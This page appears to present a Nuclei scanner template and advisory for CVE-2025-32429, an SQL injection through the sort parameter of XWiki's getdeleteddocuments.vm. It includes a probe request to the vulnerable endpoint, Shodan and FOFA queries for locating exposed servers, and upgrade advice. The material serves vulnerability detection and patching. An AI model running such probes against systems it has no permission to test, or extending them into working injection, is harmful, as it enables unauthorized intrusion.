XWiki Platform - SQL Injection

CVE-2025-32429

Early Release

Description

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions 9.4-rc-1 through 16.10.5 and 17.0.0-rc-1 through 17.2.2, it's possible for anyone to inject SQL using the parameter sort of the getdeleteddocuments.vm. It's injected as is as an ORDER BY value.

Severity

Critical

CVSS Score

9.8

Exploit Probability

16%

Affected Product

xwiki

Published Date

November 3, 2025

Template Author

ritikchaddha

CVE-2025-32429.yaml

id: CVE-2025-32429

info:
  name: XWiki Platform - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions 9.4-rc-1 through 16.10.5 and 17.0.0-rc-1 through 17.2.2, it's possible for anyone to inject SQL using the parameter sort of the getdeleteddocuments.vm. It's injected as is as an ORDER BY value.
  impact: |
    Authenticated attackers with access to the deleted documents trash feature could inject SQL code, leading to data leakage, database modification, or further compromise of the application.
  remediation: |
    Upgrade to XWiki Platform version 16.10.6 and 17.3.0-rc-1. (or newer) which addresses this vulnerability. Always validate and sanitize user-controlled input for query parameters.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-23093
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32429
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-32429
    epss-score: 0.15873
    epss-percentile: 0.94458
    cwe-id: CWE-89
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,hqli,sqli,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=injected"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Exception", "org.xwiki.livedata.LiveDataException", "HqlQueryScriptService")'
          - 'contains(content_script_type, "text/javascript")'
          - 'status_code == 500'
        condition: and
# digest: 490a00463044022039068c50d61db758cf19ad7718cb250498f3446333df503c986b33682fe39b81022039b2b03d1916edc1af16038bf89a0f263bd60bb1473f9837193402d60092730d:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2025-32429

CWE ID:

cwe-89

References

https://jira.xwiki.org/browse/XWIKI-23093 https://nvd.nist.gov/vuln/detail/CVE-2025-32429

Remediation Steps

Upgrade to XWiki Platform version 16.10.6 and 17.3.0-rc-1. (or newer) which addresses this vulnerability. Always validate and sanitize user-controlled input for query parameters.